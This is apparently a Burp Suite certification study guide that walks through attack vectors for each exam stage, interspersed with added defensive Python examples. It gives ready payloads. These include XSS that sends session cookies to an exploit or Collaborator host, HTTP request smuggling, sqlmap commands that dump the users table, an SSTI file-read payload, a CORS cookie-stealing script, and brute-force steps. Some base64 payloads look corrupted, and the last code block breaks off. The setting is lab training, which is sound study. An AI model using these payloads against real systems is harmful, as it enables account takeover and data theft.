Burp Dec 2022

This document outlines attack vectors for different stages of a hacking simulation. Stage 1 involves gaining unauthorized access to user accounts, such as by password reset poisoning, session hijacking, or brute force attacks. Stage 2 is escalating privileges to the administrator account using SQL injection or other vulnerabilities. Stage 3 involves reading a secret file on the victim's system through server-side template injection, XML external entity injection, local file inclusion, or other attacks.

Uploaded by

Bdiaf Mohammed

These are the attack vectors for each stage as of December 2nd week 2022.

STAGE1 Objective – Login as carlos/guest/any other valid user

STAGE1.APP1 – Password reset poisoning to steal reset password token of user carlos/guest
STAGE1.APP2 – Web-cache poisoning to steal user carlos’s session cookie
STAGE1.APP3 – HTTP request smuggling to steal user carlos’s session cookie
STAGE1.APP4 – XSS to steal user carlos’s session cookie where most tags and attributes are blocked
STAGE1.APP5 – XSS to steal user carlos’s session cookie via web messages and JSON.parse
STAGE1.APP6 – XSS to steal user carlos’s session cookie where “<script>” is blocked
STAGE1.APP7 – Brute forcing username and password to login to victim account
STAGE1.APP8 – Brute forcing username and password to login to victim account - Variation

STAGE2 Objective – Get access to “administrator” account

STAGE2.APP1 – SQL injection in advanced search bar to retrieve administrator’s password
STAGE2.APP2 – IDOR via “Change user email” function to login as administrator
STAGE2.APP3 – CSRF and cookie manipulation via “Update email” function to login as administrator
STAGE2.APP4 – CORS misconfiguration to steal administrator session

STAGE3 Objective – read “/home/carlos/secret” file and submit the solution

STAGE3.APP1 – SSTI in reset email template to read “/home/carlos/secret” file
STAGE3.APP2 – XXE with external DTD to read “/home/carlos/secret” file
STAGE3.APP3 – XXE with command injection to read “/home/carlos/secret” file
STAGE3.APP4 – LFI in image file path to read “/home/carlos/secret” file
STAGE3.APP5 – OS command injection to read “/home/carlos/secret” file
STAGE3.APP6 – SSRF to read “/home/carlos/secret” file
STAGE3.APP7 – File upload bypass to upload a .php file to read “/home/carlos/secret” file

STAGE1.APP1 – Password reset poisoning to steal reset password token of user carlos/guest

1. If you see “/resources/js/tracking.js” in the response and don’t see “X-Cache: hit” or “X-Cache: miss” as response headers, this is the vector. However, there are instances where you won’t see “/resources/js/tracking.js” and yet the vector is the same. This is just a quick way to figure out the vector, but do try this out even if the above-mentioned indicators are not there.

2. Brute force the login to find a valid username; use the username list from https://portswigger.net/web-security/authentication/auth-lab-usernames

3. The application returns different responses for valid and invalid usernames, so figure out the valid username by looking at the response.

4. Most of the time it’s either “carlos” or “guest”.

5. Initiate a “Reset/Forgot Password” request for the found user (let’s say the valid user is “carlos”) and intercept the request.

6. Add an “X-Forwarded-Host” header with your exploit server URL to the request and forward the request.

X-Forwarded-Host: your-exploit-server-id.exploit-server.net

7. Go to the exploit server and you should be able to see the request to reset the password, with the password reset token.

8. Go to the link and you will be prompted to change the password for “carlos”.

9. Change the password to anything, and login to “carlos” with the set password.

10. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-basic-password-reset-poisoning

STAGE1.APP2 – Web-cache poisoning to steal user carlos’s session cookie

1. If you see “/resources/js/tracking.js” in the response while also seeing “X-Cache: hit” or “X-Cache: miss” as response headers, this is the vector.

2. While testing, make sure to add a cache-buster parameter, like ?cdd=22333, so as not to poison the main page until you get the attack set up properly.

3. Add an “X-Forwarded-Host” header with your exploit server URL to the request and forward the request.

X-Forwarded-Host: your-exploit-server-id.exploit-server.net

4. Keep repeating the request until you see the absolute path of the “/resources/js/tracking.js” file is changed to “//your-exploit-server-id.exploit-server.net/resources/js/tracking.js”.

5. Go to the exploit server and change the file name of the exploit file path to:

/resources/js/tracking.js

6. Enter the following JavaScript payload in the body of the exploit. Make sure to change the exploit server URL properly.

document.location='https://your-exploit-server-id.web-security-academy.net/cookie.php?c='+document.cookie;

7. Go back and repeat the request until you see “X-Cache: miss” change to “X-Cache: hit”.

8. Once you see “X-Cache: hit” in the response, this means that the response came from the cache.

9. Now remove the cache-buster and repeat the request to poison the main page.

10. Once you see “X-Cache: hit” in the response, wait a while, then go to the exploit server and check the log for the session cookie of user “carlos”.

11. Use the cookie to login as user “carlos”.

12. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/host-header/exploiting/lab-host-header-web-cache-poisoning-via-ambiguous-requests

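Both STAGE1.APP1 and STAGE1.APP2 work because the application builds absolute URLs (the reset link, the tracking.js path) from the X-Forwarded-Host request header. The following is an added example, not code from the original document or from PortSwigger: a server-side URL builder that takes the origin from configuration, rejects unknown Host values and never consults X-Forwarded-Host. The hostnames, the /forgot-password path and the token parameter name are assumptions made for the example.

```python
from urllib.parse import urlencode

# Assumed deployment configuration: the app's public origin and the virtual
# hosts it is willing to serve. Nothing here is derived from the request.
CANONICAL_ORIGIN = "https://your-lab-id.web-security-academy.net"
ALLOWED_HOSTS = {"your-lab-id.web-security-academy.net"}


class BadHostHeader(ValueError):
    """Raised when the Host header names a virtual host we do not serve."""


def validate_host(headers: dict) -> str:
    """Return the Host value (lower-cased, port stripped) if it is allowed.

    X-Forwarded-Host is deliberately never read: if a trusted reverse proxy
    needs to rewrite the host, it should overwrite Host itself and strip any
    X-Forwarded-Host the client sent. IPv6 literals are not handled here.
    """
    host = headers.get("Host", "").strip().lower().split(":")[0]
    if host not in ALLOWED_HOSTS:
        raise BadHostHeader(f"unexpected Host header: {host!r}")
    return host


def build_reset_link(headers: dict, token: str) -> str:
    """Password-reset link for the e-mail body.

    The request is still validated so that poisoned requests are refused, but
    the link itself is built only from CANONICAL_ORIGIN, so no header value can
    end up in the e-mail. The parameter name is an assumption for the example.
    """
    validate_host(headers)
    return f"{CANONICAL_ORIGIN}/forgot-password?{urlencode({'token': token})}"


def asset_url(headers: dict, path: str) -> str:
    """Absolute URL for a static asset such as /resources/js/tracking.js.

    Because the value does not depend on any unkeyed header, a cache in front
    of the application cannot be made to store a copy pointing at another host.
    """
    validate_host(headers)
    if not path.startswith("/") or path.startswith("//"):
        raise ValueError("asset path must be site-relative")
    return CANONICAL_ORIGIN + path
```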
STAGE1.APP3 – HTTP request smuggling to steal user carlos’s session cookie

1. Visit any blog post, and if you see “User-Agent” reflected in the response, this is the vector.

2. Send the home page/base page of the application to an active Burp scan. You can select any scan configuration. As a reference, we have used “Audit coverage – thorough”. Once the scan is done, you will see an “HTTP request smuggling” finding in the scan results.

3. The attack vector for this stage is XSS via HTTP request smuggling. The input you put in the “User-Agent” header of the blog post request is reflected in the response. Therefore, we can use an XSS payload in the “User-Agent” header to trigger XSS. But, since the payload is delivered via a request header, the only way to weaponize this and send it to another user is via HTTP request smuggling.

4. Now let’s prepare the request with the XSS payload.

5. From the Burp scan result, take the “Request 1” HTTP request and send it to Repeater.

6. Remove all unnecessary headers and keep only the following headers: Host, Cookie, Connection, Content-Type, both Transfer-Encoding headers and Content-Length. It should look something like this.

7. Note that getting the “Content-Length” right is the only way to get this attack to work. As shown in the above screenshot, 25 characters are counted from the start of line 10 to the end of line 14. Use the Inspector in Repeater to get this value accurately.

8. Now, it’s time to append the request that we need to smuggle to the above request. It will look something like this.

Exploit code

GET /post?postId=1 HTTP/1.1
Host: your-lab-id.web-security-academy.net
User-agent: "><script>alert(document.cookie);var x=new XMLHttpRequest();x.open("GET","https://<your-burp-collaborator-instance-id>/"+document.cookie);x.send();</script>

9. Things to note here:

• The “postId” value should be any valid post ID value; just browse to any post and use that ID.

• In the main request, make sure the “Connection: close” header is set. It should work with “Connection: keep-alive” too, but it is better to use “Connection: close”, as it was tested to be working multiple times.

• Now to get the “Content-Length” value correctly: replace your lab ID and Burp Collaborator instance properly in the exploit code and paste it starting at line 14. Then, using the Inspector in Repeater, select everything from line 14 until the last > character in the payload. In my example, the total number of characters was noted to be 295, so the “Content-Length” header needs to be updated with 295.

• Replace lab IDs and Burp Collaborator instance IDs properly.

10. Now we are ready to exploit. Send the whole request to Intruder and clear all the payload positions, as we just need to send about 100 null requests to smuggle the request to the victim.

11. Start the attack, and if all the steps are done properly, all the requests should show “200” status and you should see your smuggled request reflecting the XSS payload in some of the responses. If the status is anything other than “200”, something is wrong. Go back and redo the steps.

12. Check the Burp Collaborator log after a while. The session cookie of user “carlos” will be there as part of the guest request.

13. Use the session cookie and login as user “carlos”.

14. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss

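The smuggling in STAGE1.APP3 depends on the front end and back end disagreeing about where one request ends, which only happens when a request carries both Content-Length and Transfer-Encoding, or an obfuscated variant of one of them. The following is an added example, not code from the original document: a check a front end, WAF or test harness can apply to the raw request bytes to refuse ambiguous framing before forwarding. The sample requests and hostname are constructed.

```python
import re

# Constructed samples. The first has the shape of a CL.TE probe: both framing
# headers are present, so two servers may disagree about where the body ends.
AMBIGUOUS_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: your-lab-id.web-security-academy.net\r\n"
    b"Connection: close\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\nG"
)
CLEAN_REQUEST = (
    b"GET /post?postId=1 HTTP/1.1\r\n"
    b"Host: your-lab-id.web-security-academy.net\r\n"
    b"User-Agent: example\r\n"
    b"\r\n"
)

KNOWN_CODINGS = {"chunked", "gzip", "deflate", "compress", "identity",
                 "x-gzip", "x-compress"}


def _header_lines(raw: bytes) -> list:
    """Raw header lines (bytes) between the request line and the blank line."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return [line for line in head.split(b"\r\n")[1:] if line]


def framing_problems(raw: bytes) -> list:
    """Return the reasons the request's framing is ambiguous (empty = OK)."""
    problems = []
    content_length, transfer_encoding = [], []
    for line in _header_lines(raw):
        raw_name, sep, value = line.partition(b":")
        if not sep:
            problems.append(f"header line without a colon: {line!r}")
            continue
        # Whitespace inside or after the name is how one server is made to
        # recognise a header that the other one ignores.
        if raw_name != raw_name.strip() or re.search(rb"[ \t]", raw_name):
            problems.append(f"malformed header name {raw_name!r}")
        name = raw_name.strip().lower().decode("latin-1")
        val = value.strip().decode("latin-1")
        if name == "content-length":
            content_length.append(val)
        elif name == "transfer-encoding":
            transfer_encoding.append(val)
    if content_length and transfer_encoding:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(content_length)) > 1:
        problems.append(f"conflicting Content-Length values {content_length}")
    for val in content_length:
        if not re.fullmatch(r"[0-9]+", val):
            problems.append(f"non-numeric Content-Length {val!r}")
    for val in transfer_encoding:
        codings = [c.strip().lower() for c in val.split(",")]
        if codings[-1] != "chunked":
            problems.append(f"Transfer-Encoding does not end with chunked: {val!r}")
        unknown = [c for c in codings if c not in KNOWN_CODINGS]
        if unknown:
            problems.append(f"unrecognised transfer coding(s) {unknown}")
    return problems


def is_unambiguous(raw: bytes) -> bool:
    """True when a front end may safely forward the request as-is."""
    return not framing_problems(raw)
```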
STAGE1.APP4 – XSS to steal user carlos’s session cookie where most tags and attributes are blocked

1. The easiest way to identify this vector is by injecting the following payload into the search function of the application. If it is rejected, this is the vector.

</ScRiPt>

2. Running a Burp scan on the search function will also confirm that XSS exists, but as HTML injection.

3. Refer to the below lab and run Intruder to figure out which tags and attributes are allowed by the application.

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-tags-and-attributes-blocked

4. According to the scans there can be 4 different combinations of tags and attributes allowed:

• <body onhashchange>
• <body onload>
• <body onmessage>
• <body onpopstate>

5. Depending on the payload that works, go to the exploit server and use the payloads below. Make sure to change the search parameter (it can be ?query=, it can be ?find= or it can be ?search-term=) depending on the lab you receive, and make sure to change the exploit server location in the base64-encoded highlighted part (if any) accordingly. The exploit should be hosted at the default location of the exploit server (/exploit).

<body onhashchange>

<iframe src="https://your-lab-id.web-security-academy.net/?query=%27%3Cbody%20onhashchange=%22eval(atob('ZG9jdW1lbnQubG9jYXRpb24MDFlZjg2NTkxYzA4ZDFlZGMwMWNlMDBiYy53ZWItc2VjdXJpdHktYWNhZGVteS5uZXQvP2M9Jytkb2N1bWVudC5jb29raWU='))%22%3E//" onload="this.onload='';this.src+='#XSS'"></iframe>

<body onmessage>

<!DOCTYPE html>
<body onload="CrossPwn()">
<h2>CrossPwn</h2>
<p>OnMessage XSS</p>
<p>Use target & msg as URL parameters.</p>
<iframe id="f" height="0" style="visibility:hidden">
</iframe>
<script>
searchParams = new URLSearchParams(document.location.search);
target = searchParams.get('target');
msg = searchParams.get('msg');
document.getElementById('f').setAttribute('src', target);
function CrossPwn() {frames[0].postMessage(msg,'*')}
</script>
</body>
</html>

<iframe src="https://your-exploit-server-id.exploit-server.net/exploit?target=https://your-lab-id.web-security-academy.net/?SearchTerm=%3Cbody%20onmessage=document.location=%22https://your-exploit-server-id.exploit-server.net/?c=%22%25%32%62(document.cookie)%3E>">

<body onload>

<iframe src="https://your-lab-id.web-security-academy.net/?searchterm=%22%3E%3Cbody%20onload=%22document.location%22%5D%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fyour-exploit-server-id%252eweb-security-academy%252enet/?c='+document%252ecookie"%22%3E//">

<body onpopstate>

<iframe src="https://your-lab-id.web-security-academy.net/?searchTerm=%27%3Cbody%20onpopstate=%22eval(atob(%27ZG9jdW1lbnQubG9jYlOTAyYzAyZTFmYjIwMTQxMDBmYi5leHBsb2l0LXNlcnZlci5uZXQvP2M9Jytkb2N1bWVudC5jb29raWU=%27))%22%3E" onload="if(!window.flag){this.contentWindow.location='https://your-lab-id.web-security-academy.net/?searchTerm=%27%3Cbody%20onpopstate=%22eval(atob(%27ZG9jdW1lbnQubG9jYXRphlOTAyYzAyZTFmYjIwMTQxMDBmYi5leHBsb2l0LXNlcnZlci5uZXQvP2M9Jytkb2N1bWVudC5jb29raWU=%27))%22%3E#';flag=1}"></iframe>

6. Store the exploit and click “Deliver exploit to victim”. Wait a while and go to the server log to extract the cookie.

7. Use the session cookie and login as user “carlos”.

8. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-tags-and-attributes-blocked

STAGE1.APP5 – XSS to steal user carlos’s session cookie via web messages and JSON.parse

1. If you see the “JSON.parse(e.data);” string in the response of the lab, this is the vector.

2. Use the below payload in the exploit server. Make sure to change the lab ID and exploit server ID properly.

<iframe src=https://your-lab-id.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"redirect\",\"redirectUrl\":\"javascript:window.location=%22https://your-exploit-server-id.web-security-academy.net/?c=%22%2bdocument.cookie\"}","*")'>

3. Store the exploit and click “Deliver exploit to victim”. Wait a while and go to the server log to extract the cookie.

4. Use the session cookie and login as user “carlos”.

5. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-json-parse

STAGE1.APP6 – XSS to steal user carlos’s session cookie where “<script>” is blocked

1. The easiest way to identify this vector is by injecting the following payload into the search function of the application. If it is accepted, this is the vector.

</ScRiPt>

2. Running a Burp scan on the search function will also confirm that XSS exists with the proper bypass.

3. Use the below payload in the exploit server. Make sure to change the lab ID and exploit server ID properly. Make sure to change the search parameter (it can be ?query=, it can be ?find= or it can be ?search-term=) depending on the lab you receive.

<script>location='https://your-lab-id.web-security-academy.net/?lookup=%3C%2FScRiPt%20%3E%3Cimg%20src%3Da%20onerror%3D%28document.location%29%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fyour-exploit-server-id.web-security-academy.net%2F%3F%22%2B%28document.cookie%29%3E';</script>

4. Store the exploit and click “Deliver exploit to victim”. Wait a while and go to the server log to extract the cookie.

5. Use the session cookie and login as user “carlos”.

6. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-url-some-characters-blocked

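STAGE1.APP4 and APP6 reflect the search term into HTML and rely on blocking particular tags, while STAGE1.APP5 follows an attacker-supplied redirectUrl. The following is an added example, not code from the original document: the server-side counterpart of both fixes, encoding the term for its HTML context instead of filtering tags, and accepting only same-site redirect targets. The page markup and hostnames are constructed for the example.

```python
import html
from urllib.parse import urlsplit


def render_search_result(term: str) -> str:
    """Render a reflected search term into element text and a quoted attribute.

    html.escape(..., quote=True) converts &, <, >, " and ' to entities, so no
    character that could open a tag or close the attribute survives, whatever
    tag or event handler the term contains. No tag deny-list is involved.
    """
    safe = html.escape(term, quote=True)
    return (
        "<section>"
        f"<h1>Search results for '{safe}'</h1>"
        f'<input type="text" name="search" value="{safe}">'
        "</section>"
    )


def is_safe_redirect_target(url: str, own_host: str) -> bool:
    """Accept only site-relative paths or http(s) URLs on own_host.

    Rejects javascript: and data: URLs, protocol-relative //host targets and
    any cross-origin destination, which covers every redirectUrl shape above.
    """
    candidate = url.strip()
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative target: must be a single-slash path, not //other-host
        return candidate.startswith("/") and not candidate.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False
    return parts.hostname is not None and parts.hostname.lower() == own_host.lower()
```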
STAGE1.APP7 – Brute forcing username and password to login to victim account

1. If none of the above vectors work, most likely this would be the vector.

2. First figure out the valid usernames in the application. The application returns different responses for valid and invalid usernames, so figure out the valid username by looking at the response. You can try usernames from here: https://portswigger.net/web-security/authentication/auth-lab-usernames

3. Once valid usernames are figured out, initiate a login request and send it to Intruder.

4. Use the password list from https://portswigger.net/web-security/authentication/auth-lab-passwords and start brute forcing.

5. When the correct combination of username and password is found, you will see a “302 Found” response.

6. Login with the username and password combination.

7. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses

STAGE1.APP8 – Brute forcing username and password to login to victim account - Variation

1. This is the same as STAGE1.APP7, but if you try to brute force with known usernames in the list, the anti-CSRF token will be invalidated and the brute force won’t work.

2. So, get the usernames from here: https://portswigger.net/web-security/authentication/auth-lab-usernames

3. Remove known usernames like “carlos”, “administrator” and “admin” from the list and run the brute force until a valid username is found.

4. Once a correct username is found, use the password list from https://portswigger.net/web-security/authentication/auth-lab-passwords and start brute forcing.

5. When the correct combination of username and password is found, you will see a “302 Found” response.

6. Login with the username and password combination.

7. STAGE1 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses

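STAGE1.APP7 and APP8 leave a distinctive trace on the server side: one client sends many POST /login attempts that each get the login page back (200), often cycling through usernames first, until a single 302 marks success. The following is an added example, not code from the original document: a detector run over constructed access-log lines that flags that pattern. The log format, the threshold and the addresses are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed log format: client, timestamp, request line, status, posted username.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) user=(?P<user>\S*)$'
)

# Constructed sample: username enumeration, then password guessing for carlos,
# then the 302 that STAGE1.APP7 step 5 calls out, plus one unrelated login.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 [02/Dec/2022:10:00:{i:02d}] "POST /login HTTP/1.1" 200 user={u}'
     for i, u in enumerate(["admin", "root", "test", "guest", "wiener", "carlos"])]
    + [f'10.0.0.5 [02/Dec/2022:10:01:{i:02d}] "POST /login HTTP/1.1" 200 user=carlos'
       for i in range(12)]
    + ['10.0.0.5 [02/Dec/2022:10:02:00] "POST /login HTTP/1.1" 302 user=carlos',
       '10.0.0.9 [02/Dec/2022:10:02:05] "POST /login HTTP/1.1" 302 user=wiener',
       '10.0.0.9 [02/Dec/2022:10:02:06] "GET /my-account HTTP/1.1" 200 user=']
)


def analyse_logins(log_text: str, threshold: int = 10) -> dict:
    """Per-client login statistics for clients with >= threshold failed POSTs.

    A failed attempt is any POST /login that did not answer 302. 'users' is the
    set of usernames tried (a wide set indicates enumeration) and
    'success_after_failures' is set when a 302 follows at least threshold
    failures, i.e. a guess most likely succeeded.
    """
    stats = defaultdict(
        lambda: {"failed": 0, "users": set(), "success_after_failures": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != "/login":
            continue
        rec = stats[m["ip"]]
        if m["status"] == "302":
            if rec["failed"] >= threshold:
                rec["success_after_failures"] = True
        else:
            rec["failed"] += 1
            rec["users"].add(m["user"])
    return {ip: rec for ip, rec in stats.items() if rec["failed"] >= threshold}


def suspicious_clients(log_text: str, threshold: int = 10) -> list:
    """Sorted client addresses that crossed the failure threshold."""
    return sorted(analyse_logins(log_text, threshold))
```

The same counter, keyed by username instead of client address, is the signal for a distributed attack against one account; the uniform-response fix for enumeration (identical error text and status for unknown and known usernames) is the mitigation on the application side.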
STAGE2.APP1 – SQL injection in advanced search bar to retrieve administrator’s password

1. Once you are logged in as a normal user, most of the time as user “carlos”, if you see an “Advanced Search” option, this is the vector.

2. Do a quick single-quote injection to confirm which parameter is vulnerable. Depending on the lab, the parameter changes.

3. Run a Burp scan on the function in case you want to confirm the SQL injection.

4. There are two ways to run sqlmap to dump the administrator password.

• Copy the whole GET request to a file and run sqlmap with -r using the following command:

sqlmap -r <filename> --force-ssl -p <parameter> --risk 3 --level 3 --dump -T users

• Run sqlmap directly on the URL. Make sure to use the proper URL and cookies from your session. Add a * on the parameter that is vulnerable to SQL injection to make data dumping efficient.

sqlmap -u "https://your-lab-id.web-security-academy.net/filtered_search?query=test*&OrganizeBy=DATE&author=" --cookie="_lab=your-lab-cookie; session=your-session-cookie" --risk 3 --level 3 --dump -T users

5. Once done, you should have the password for the administrator user.

6. Use the password and login to the administrator account.

7. STAGE2 solved!

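STAGE2.APP1 succeeds because the advanced-search parameters are concatenated into SQL. The following is an added example, not code from the original document or the lab: the vulnerable query pattern next to a hardened version, using an in-memory SQLite schema constructed for the purpose. The parameter names query, OrganizeBy and author are taken from the sqlmap command above; the sort key, which cannot be bound as a parameter, goes through an allowlist of column names.

```python
import sqlite3

# OrganizeBy values the UI offers, mapped to real column names. Anything else
# is refused rather than interpolated into the ORDER BY clause.
SORT_COLUMNS = {"DATE": "created", "TITLE": "title"}


def setup_db() -> sqlite3.Connection:
    """Constructed schema: a posts table and the users table sqlmap targets."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT, author TEXT, created TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO posts(title, author, created) VALUES
            ('Cache poisoning basics', 'carlos', '2022-12-01'),
            ('Request smuggling notes', 'wiener', '2022-12-02');
        INSERT INTO users VALUES ('administrator', 'placeholder-password');
        """
    )
    return conn


def vulnerable_search(conn, query: str, organize_by: str, author: str) -> list:
    """String-built query. A single quote in any field breaks the SQL, which
    is exactly the quick check described in step 2 above."""
    sql = (
        f"SELECT title FROM posts WHERE title LIKE '%{query}%' "
        f"AND author LIKE '%{author}%' ORDER BY {organize_by}"
    )
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn, query: str, organize_by: str, author: str) -> list:
    """Bound parameters for the text fields; allowlisted identifier for ORDER BY."""
    try:
        order_column = SORT_COLUMNS[organize_by]
    except KeyError:
        raise ValueError(f"unsupported OrganizeBy value {organize_by!r}") from None
    sql = (
        "SELECT title FROM posts WHERE title LIKE ? AND author LIKE ? "
        f"ORDER BY {order_column}"
    )
    return [row[0] for row in conn.execute(sql, (f"%{query}%", f"%{author}%"))]
```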
STAGE2.APP2 – IDOR via “Change user email” function to login as administrator

1. If you see the change email/update email request in the following JSON format, this is the vector.

2. Send the request to Intruder and manually add the “roleid: $$” string into the request body.

3. Run the attack from 1 to 200 and you will notice two “302” responses.

4. Take that request and send it from the browser. Now you should be logged in as administrator.

5. STAGE2 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile

STAGE2.APP3 – CSRF and cookie manipulation via “Update email” function to login as administrator

1. If you see the following session cookie format after logging in as “carlos”, this is the vector.

2. While logged in, initiate an email change request. You can pause this request in the Proxy intercept or just let it go through. The important thing is to note down or copy the session cookie value and csrf token. Make sure the session cookie value “isloggedin”:true is set.

3. In an Incognito browser session, go to the application, initiate a password reset request for administrator and intercept the request. Replace the session cookie value and csrf token value in this request and forward the request. In the response, you should see an administrator session cookie with “isloggedin”:true.

4. Use this cookie and login as administrator.

5. STAGE2 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session

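STAGE2.APP2 works because the change-email handler copies every JSON field it receives, roleid included, into the user record; STAGE2.APP3 works because the CSRF token and the isloggedin cookie are not bound to the session that presents them. The following is an added example, not code from the original document: an allowlist for user-editable profile fields, a CSRF token derived from the session id with an HMAC, and login state kept server-side rather than in a client-readable cookie. The session store, secret and session ids are constructed.

```python
import hashlib
import hmac
import secrets

# Fields a user may change about themselves. The role is deliberately absent.
USER_EDITABLE_FIELDS = {"email"}

# Constructed server-side session store: session id -> record. Role and login
# state live here, never in a cookie the client can edit.
SESSIONS = {
    "sess-carlos": {"username": "carlos", "roleid": 2},
    "sess-admin": {"username": "administrator", "roleid": 1},
}

# Constructed per-deployment secret used to derive CSRF tokens.
CSRF_SECRET = secrets.token_bytes(32)


def apply_profile_update(user: dict, payload: dict) -> dict:
    """Return the updated record, or raise if the payload touches a field the
    user may not set (mass-assignment check)."""
    unknown = set(payload) - USER_EDITABLE_FIELDS
    if unknown:
        raise PermissionError(f"not user-editable: {sorted(unknown)}")
    return {**user, **payload}


def csrf_token_for(session_id: str) -> str:
    """Token bound to one session: HMAC-SHA256 over the session id."""
    return hmac.new(CSRF_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, presented: str) -> bool:
    """A token minted for one session does not verify for another."""
    return hmac.compare_digest(csrf_token_for(session_id), presented or "")


def change_email(session_id: str, csrf_token: str, payload: dict) -> dict:
    """Handler wiring the checks together. The acting user is the session
    owner; no username, role or login flag is accepted from the request."""
    session = SESSIONS.get(session_id)
    if session is None:
        raise PermissionError("not logged in")
    if not verify_csrf(session_id, csrf_token):
        raise PermissionError("bad CSRF token")
    SESSIONS[session_id] = apply_profile_update(session, payload)
    return SESSIONS[session_id]
```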
STAGE2.APP4 – CORS misconfiguration to steal administrator session

1. If you see the following script in the response while on the user account page, this is the vector.

2. If you go to the URL from the response, you will see the active session cookies for your account. Make sure to include the “UnixTimeStamp” parameter as well.

3. The request to “/accountdetails/” will time out if the “UnixTimeStamp” has expired. So, make sure to refresh the account page to get a new value, or you can use a future value.

4. When you add an “Origin” header with any arbitrary domain, you can see that it’s reflected in the response as “Access-Control-Allow-Origin: domain” together with “Access-Control-Allow-Credentials: true”. This confirms the existence of the CORS vulnerability.

5. Go to the exploit server and paste the following payload. Make sure your lab URL is correct and the “/accountdetails/” path is set with a valid “UnixTimeStamp”.

<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://your-lab-id.web-security-academy.net/accountdetails/?UnixTimestamp=1111111111111',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>

6. Deliver the exploit to the victim. This time, the victim will be the administrator. Check the log in a while and see that the admin cookie is logged.

7. Get the cookie and login to the application as administrator.

8. STAGE2 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack

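The check in step 4 above detects an origin-reflecting CORS policy. The following is an added example, not code from the original document: the reflecting behaviour beside an allowlist-based version that returns CORS headers only for exact, known origins, sends none for anything else (including the literal “null” origin), and adds Vary: Origin so caches do not mix the two. The trusted origin is constructed.

```python
from urllib.parse import urlsplit

# Origins allowed to make credentialed cross-origin requests (constructed).
TRUSTED_ORIGINS = {"https://your-lab-id.web-security-academy.net"}


def vulnerable_cors_headers(origin):
    """The behaviour step 4 detects: whatever Origin arrives is echoed back
    together with Allow-Credentials, so any site can read the response."""
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def safe_cors_headers(origin):
    """Allowlist exact origins; otherwise send no CORS headers at all."""
    if origin is None:
        return {}
    candidate = origin.strip()
    parts = urlsplit(candidate)
    # A real Origin is scheme://host[:port] only. Anything else, including
    # the literal "null" sent from sandboxed frames, is rejected.
    if (not parts.scheme or not parts.netloc or parts.path or parts.query
            or parts.fragment):
        return {}
    normalized = f"{parts.scheme.lower()}://{parts.netloc.lower()}"
    if normalized not in TRUSTED_ORIGINS:
        return {}
    return {"Access-Control-Allow-Origin": normalized,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}
```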
STAGE3.APP1 – SSTI in reset email template to read “/home/carlos/secret” file

1. If you see an Admin panel like this, then this is the vector.

2. Change {{username}} to the following payload:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/carlos/secret').read() }}

3. Change admin’s email address or carlos’ email address to the email address given in the exploit server.

4. Logout from the application and initiate a password reset request for either admin or carlos accordingly.

5. Go to the email log, extract the solution and submit it.

6. STAGE3 solved!

Sample lab from Burp Academy

https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context
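The STAGE3.APP1 payload works because the admin-editable e-mail template is compiled by a full template engine that evaluates expressions. The following is an added example, not code from the original document or the lab: rendering the reset e-mail with Python’s string.Template, which only substitutes named placeholders and has no expression syntax, so template text such as the {{ ... }} payload above is emitted literally. The placeholder names and default template are assumptions made for the example.

```python
from string import Template

# Placeholders the reset e-mail may use (assumed for the example).
ALLOWED_PLACEHOLDERS = {"username", "reset_link"}
DEFAULT_TEMPLATE = "Hello $username, use $reset_link to reset your password."


def placeholders_in(template_text: str) -> set:
    """Names referenced as $name or ${name}; a stray $ is an error, not code."""
    names = set()
    for match in Template.pattern.finditer(template_text):
        name = match.group("named") or match.group("braced")
        if name:
            names.add(name)
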